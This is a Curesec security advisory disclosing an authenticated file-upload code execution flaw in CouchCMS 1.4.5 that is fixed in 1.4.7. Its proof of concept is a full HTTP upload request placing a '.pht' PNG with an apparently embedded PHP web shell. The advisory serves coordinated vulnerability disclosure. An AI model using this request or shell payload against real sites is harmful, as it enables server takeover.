Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    CouchCMS 1.4.5
Fixed in:            1.4.7
Fixed Version Link:  http://www.couchcms.com/products/
Vendor Website:      http://www.couchcms.com/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  11/17/2015
Disclosed to public: 12/21/2015
Release mode:        Coordinated Release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

CVSS

High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C

Description

When uploading a file, the file extension is checked against a blacklist. This
blacklist misses at the least pht, which is executed by most default Apache
configurations. The uploaded file must be a valid image file, but an attacker
can bypass this restriction.

Admin credentials are required to upload files.

A htaccess file forbids the execution of PHP code in uploaded files, but some
servers are configured to not read htaccess files, for example for performance
reasons. Apache for example ignores htaccess files by default since version
2.3.9.

3. Proof of Concept


POST /CouchCMS-1.4.5/couch/includes/kcfinder/browse.php?type=image&lng=en&act=upload&nonce=1abb096565d868f94f727f600e8c4f61 HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------18851501621445926637695954351
Content-Length: 529

-----------------------------18851501621445926637695954351
Content-Disposition: form-data; name="upload[]"; filename="imageshell.pht"
Content-Type: application/octet-stream

[base64: iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAIAAAD8GO2jAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAYElEQVRIiWNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs/PliAgYHBc143k/yPi9t+X9N9qif38ePJv1/vBnyyMDBj2bln/dk9G84yjIJRMApGwSgYBaNgFIyCUTAKhg0AAIGyGwIHeA0MAAAAAElFTkSuQmCC]

The shellcode used can be found here: https://www.idontplaydarts.com/2012/06/
encoding-web-shells-in-png-idat-chunks/

4. Solution

To mitigate this issue please upgrade at least to version 1.4.7:

http://www.couchcms.com/products/

Please note that a newer version might already be available.

5. Report Timeline

11/17/2015 Informed Vendor about Issue
11/18/2015 Vendor sends fixes for confirmation
11/20/2015 Verified fixes
11/24/2015 Vendor releases fix
12/21/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/CouchCMS-145-Code-Execution-125.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany